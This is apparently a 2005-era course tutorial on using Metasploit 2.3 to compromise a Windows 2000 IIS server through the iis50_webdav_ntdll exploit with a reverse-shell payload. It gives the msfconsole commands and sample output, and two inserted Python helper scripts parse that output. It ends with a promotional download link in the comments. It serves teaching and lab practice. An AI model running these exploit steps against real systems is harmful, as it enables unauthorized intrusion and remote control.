The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system.
These steps can be done easily from most popular bootable Linux CD distributions. The steps below are for the Whoppix/Whax distro (now known as, or rather replaced by, BackTrack, for those of you who are not old like me). The steps are the same on any distro; just substitute the correct paths for whatever one you use.
If you want to take a trip down memory lane, here you go; 2005-ish is when these were last updated :P (otherwise just use Back|Track).
Whoppix - Knoppix based
Download Whoppix Linux 2.7.1
Whax - Slax based
Download WHAX 3.0 for Linux - WHAX is the natural evolution of WHoppix - a live CD, standalone penetration testing toolkit. - Softpedia
To begin, boot from your CD and open a shell window. From there you need to change to the Metasploit™ directory and start the console. From a command prompt type:
cd /KNOPPIX/pentest/exploits/framework-2.3/
./msfconsole
Once msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stem from the following commands:
use
show
info
The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below.
The info command provides details about a specific module.
Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually select the exploit type "use iis50_webdav_ntdll"
After use – configure options
We’ve selected our exploit, but we are not done yet. We need to set options, which include the destination IP and the destination port. Options are configured with the set command. The show advanced command will tell you if there are more options that can be set; most exploits do not have advanced options.
Start by typing
show options
These include RHOST (the host that we are going to compromise) and RPORT (the port that the vulnerable service is listening on).
To set these options type
set RHOST <your partner machines IP address>
set RPORT 80
We have a system and we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type
check
This will test whether the server or target appears vulnerable. Not every exploit implements a check, so this may not work for all of them.
For some exploits you might have to provide information about what type of system you are compromising. With the attack listed above this is not necessary. If you want to know why this matters, sign up for the ethical hacking courses. Here are the steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target you are hoping to compromise. This usually means the OS and the service pack level of the system. Some modules offer a brute force target. What is being configured here is the memory offset (the return address) that the exploit will use to reach the vulnerable function. The brute force option tries many memory offsets, but the result is a lot less stealthy, particularly if you are unsuccessful. To list the targets, enter
show targets
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
What Metasploit™ calls a payload, many others refer to as shellcode or opcode. This is the code we want inserted directly into the buffer we are overflowing. In most cases the shellcode is service pack dependent, OS dependent, and architecture (i386) dependent as well, so most of the payloads in the Metasploit™ framework work only on certain OSs and certain processors. Even after you select an appropriate payload you will have to configure options to get it to work. The most frequently used type of shellcode generates a reverse shell from the compromised system back to the attacking system. The show and info commands described in the exploits section apply to payloads as well. If you type
show payloads
msf iis50_webdav_ntdll > show payloads
Metasploit™ Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
To select the reverse shell payload type
set PAYLOAD win32_reverse
To see these options type
show options
msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce
Notice that LHOST, the address the reverse shell connects back to, has no default. To find your own address, open a shell and type
ifconfig
[root@localhost ~]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:03:25:13:43:F2
          inet addr:10.5.14.173  Bcast:10.5.15.255  Mask:255.255.252.0
          inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3696580 (3.5 MiB)  TX bytes:325618 (317.9 KiB)
          Interrupt:193 Base address:0x4c00

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:213 errors:0 dropped:0 overruns:0 frame:0
          TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:49707 (48.5 KiB)  TX bytes:49707 (48.5 KiB)
Once we know this value (the inet addr of eth0, 10.5.14.173 in the output above) we set it with the set command.
To do this type
set LHOST <your IP address>
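As an added example (not code from this page or from the Metasploit project), the following Python script automates the two manual steps just described: it pulls the first non-loopback IPv4 address out of ifconfig output (the value you would give LHOST) and parses the "show options" listing to report which required options still have no value. Both sample texts are constructed copies of the listings on this page. The parsing rule, that a single token which does not start with a capital letter is a default while the description always starts with one, is an assumption about this flattened listing, not a property of msfconsole.

```python
import re

# Constructed sample: the "show options" listing from this page, with LHOST still unset.
OPTIONS_OUTPUT = """\
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce
"""

# Constructed sample: the ifconfig output from this page, continuation lines indented.
IFCONFIG_OUTPUT = """\
eth0      Link encap:Ethernet  HWaddr 00:03:25:13:43:F2
          inet addr:10.5.14.173  Bcast:10.5.15.255  Mask:255.255.252.0
          inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
"""

# Assumption about this flattened listing: a default is one token that does not start
# with a capital letter (80, seh, 67.36.70.19), and the description always does.
OPTION_RE = re.compile(r"^(required|optional)\s+(\S+)(?:\s+([^A-Z\s]\S*))?\s+([A-Z].*)$")


def parse_options(text):
    """Map option name -> {'required': bool, 'default': str or None, 'desc': str}."""
    options = {}
    for line in text.splitlines():
        m = OPTION_RE.match(line.strip())
        if m:
            flag, name, default, desc = m.groups()
            options[name] = {"required": flag == "required", "default": default, "desc": desc}
    return options


def missing_required(options, settings):
    """Required options with no default that have not been given a value with `set`."""
    return [name for name, opt in options.items()
            if opt["required"] and opt["default"] is None and name not in settings]


def local_ipv4(ifconfig_text):
    """First non-loopback IPv4 address in `ifconfig` output, or None if there is none."""
    iface = None
    for line in ifconfig_text.splitlines():
        if line and not line[0].isspace():
            iface = line.split()[0]          # a new interface block starts in column 0
        m = re.search(r"inet addr:(\d+\.\d+\.\d+\.\d+)", line)
        if m and iface != "lo":
            return m.group(1)
    return None


if __name__ == "__main__":
    opts = parse_options(OPTIONS_OUTPUT)
    print("unset required options:", missing_required(opts, {}))      # ['LHOST']
    settings = {"LHOST": local_ipv4(IFCONFIG_OUTPUT)}                  # 10.5.14.173
    print("after set LHOST:", missing_required(opts, settings))        # []
```

Running it shows LHOST as the only required option without a value before the set command and an empty list afterwards; the same check flags a missing RHOST if you paste a listing in which it was never set.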
This payload with this exploit has no advanced options, but to check for them on other exploits type
show advanced
msf iis50_webdav_ntdll(win32_reverse) > show advanced
Exploit and Payload Options
===========================
Exploit (Msf::Exploit::iis50_webdav_ntdll):
-------------------------------------------
Payload (Msf::Payload::win32_reverse):
--------------------------------------
Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type
exploit
If you've done everything right you should see something like the below.
- Starting Reverse Handler.
- Connecting to web server. OK
- Trying return address 0x004e004f...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00420041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00430041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00c10041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00c30041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00c90041...
- Sending request (65739 bytes)
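To make the earlier remark that brute forcing is "a lot less stealthy" concrete, here is an added Python example (not from this page or from the Metasploit project) that parses the handler output above, reproduced as a constructed sample, and summarizes what the other side saw: one fresh connection and one 65739-byte request for every return address tried. The thresholds in is_noisy are assumptions chosen for illustration.

```python
import re

# Constructed sample: the msfconsole handler output shown on this page.
HANDLER_OUTPUT = """\
- Starting Reverse Handler.
- Connecting to web server. OK
- Trying return address 0x004e004f...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00420041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00430041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00c10041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00c30041...
- Sending request (65739 bytes)
- Connecting to web server. OK
- Trying return address 0x00c90041...
- Sending request (65739 bytes)
"""

RETADDR_RE = re.compile(r"Trying return address (0x[0-9a-fA-F]+)")
SIZE_RE = re.compile(r"Sending request \((\d+) bytes\)")
CONNECT_RE = re.compile(r"Connecting to web server\. OK")


def summarize_bruteforce(text):
    """Count what the brute-force target put on the wire: connections, attempts, bytes."""
    addrs = RETADDR_RE.findall(text)
    sizes = [int(s) for s in SIZE_RE.findall(text)]
    return {
        "connections": len(CONNECT_RE.findall(text)),
        "attempts": len(addrs),
        "return_addresses": addrs,
        "request_sizes": sorted(set(sizes)),
        "bytes_sent": sum(sizes),
    }


def is_noisy(summary, max_attempts=1, min_request_bytes=16384):
    """Assumed rule of thumb: more than one oversized request in a single run is the
    kind of burst that shows up in a web server log or IDS as repeated huge requests
    from one source, which is why the brute force target is the less stealthy choice."""
    return (summary["attempts"] > max_attempts
            and bool(summary["request_sizes"])
            and summary["request_sizes"][-1] >= min_request_bytes)


def report(summary):
    """One-line analyst summary of the run."""
    return ("%d connections, %d return addresses tried, %d bytes sent (request sizes: %s)"
            % (summary["connections"], summary["attempts"], summary["bytes_sent"],
               ", ".join(str(s) for s in summary["request_sizes"])))


if __name__ == "__main__":
    s = summarize_bruteforce(HANDLER_OUTPUT)
    print(report(s))          # 6 connections, 6 return addresses tried, 394434 bytes sent ...
    print("noisy:", is_noisy(s))
```

Six connections carrying nearly 400 KB of identical-size requests in a few seconds is exactly the pattern a web server log review or a simple request-size threshold picks up, which is the practical cost of choosing the brute force target over a precise one.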
Metasploit™ – available from http://www.Metasploit.com
It is not essential to boot a Linux CD. To try out the framework on a Windows system, the Metasploit Project provides a Windows installer on its web site.
Comments:
Download SecurityTube Metasploit Framework Expert DVD FREE Enjoy ;)
http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/?id=download